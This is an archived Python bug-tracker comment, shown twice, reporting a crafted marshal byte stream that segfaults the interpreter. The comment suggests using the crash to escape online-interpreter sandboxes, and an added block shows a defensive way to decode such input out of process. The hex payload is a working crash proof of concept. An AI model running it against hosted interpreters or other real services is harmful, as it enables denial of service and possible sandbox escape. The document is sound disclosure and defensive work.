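Iman Sharafodin <iman.sharafo...@gmail.com> added the comment:

There are many online Python interpreters; we can use this malicious file to escape their sandboxes and get control of their Docker container or system (and abuse them, for example, to conduct a DoS attack), as they fully trust that Python doesn't generate a segfault. For example, the following code clearly kills the interpreter (and a shellcode can be attached), even though they have protection mechanisms for file access and many other things.

-----------
https://www.programiz.com/python-programming/online-compiler/
-----------
import io
import marshal

# Crafted marshal stream, hex-encoded
hex_string = "FBE901000000DA0136E90209000072010000007203000000DA0168A90372010000007205000000DA026161DA026A6A7BDA0278785B020000007201000000DA01353030DA0170E7E10B930189E4414130"
myb = bytes.fromhex(hex_string)
f = io.BytesIO(myb)
print(f)
# The interpreter dies inside marshal.load(); the lines below never run
data = marshal.load(f)
print(data)
print('We have segfault but we cannot see!')
-------------------

----------
_______________________________________
Python tracker <rep...@bugs.python.org>
<https://bugs.python.org/issue41208>
_______________________________________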
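
For services that must accept marshal data, one way to make the silent crash described in the comment above visible is to decode in a throwaway child interpreter and classify its exit status. This is an added example, not code from the original comment or from CPython; `probe_marshal`, `classify_exit` and exit code 3 are hypothetical names and conventions chosen here, and signal detection assumes a POSIX host.

```python
import marshal
import subprocess
import sys

# Child program (run in a separate interpreter): unmarshal stdin, report by exit code.
_CHILD = """
import marshal, sys
try:
    marshal.loads(sys.stdin.buffer.read())
except (ValueError, EOFError, TypeError):
    sys.exit(3)  # parser rejected the input cleanly
"""


def classify_exit(returncode: int) -> str:
    """Map a child exit status to a verdict (negative = killed by a signal on POSIX)."""
    if returncode == 0:
        return "ok"
    if returncode == 3:
        return "rejected"
    if returncode < 0:
        return f"crashed (signal {-returncode})"
    return f"failed (exit {returncode})"


def probe_marshal(data: bytes, timeout: float = 5.0) -> str:
    """Decode untrusted marshal bytes out of process so a crash cannot take the caller down.

    This only makes the crash observable. It does not contain memory corruption,
    so the child still needs its own sandbox (container, seccomp, no network).
    """
    try:
        proc = subprocess.run(
            [sys.executable, "-I", "-c", _CHILD],  # -I: isolated mode, ignores env and user site
            input=data,
            stdout=subprocess.DEVNULL,
            stderr=subprocess.DEVNULL,
            timeout=timeout,
        )
    except subprocess.TimeoutExpired:
        return "timeout"
    return classify_exit(proc.returncode)


if __name__ == "__main__":
    # Constructed sample inputs: one valid stream, one with an unknown type code.
    print(probe_marshal(marshal.dumps({"a": [1, 2, 3]})))
    print(probe_marshal(b"\xff"))
```

The verdict for any given byte string depends on the interpreter version running the child, so log the "crashed" cases with the Python version alongside.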
There are many online Python interpreters, we can use this malicious file to escape their sandboxes and get control of their Docker container or system (and abuse them, for example, to conduct a DoS attack), as their fully trust that Python doesn't generate segfault. For example, the following code clearly kills the interpreter (and a shellcode can be attached), even though, they have protection mechanisms for file access and many other things. ----------- https://www.programiz.com/python-programming/online-compiler/ ----------- import io import marshal hex_string = "FBE901000000DA0136E90209000072010000007203000000DA0168A90372010000007205000000DA026161DA026A6A7BDA0278785B020000007201000000DA01353030DA0170E7E10B930189E4414130" myb = bytes.fromhex(hex_string) f = io.BytesIO(myb) print(f) data = marshal.load(f) print(data) print('We have segfault but we cannot see!') ------------------- ---------- _______________________________________ Python tracker <rep...@bugs.python.org> <https://bugs.python.org/issue41208> _______________________________________ _______________________________________________ Python-bugs-list mailing list Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com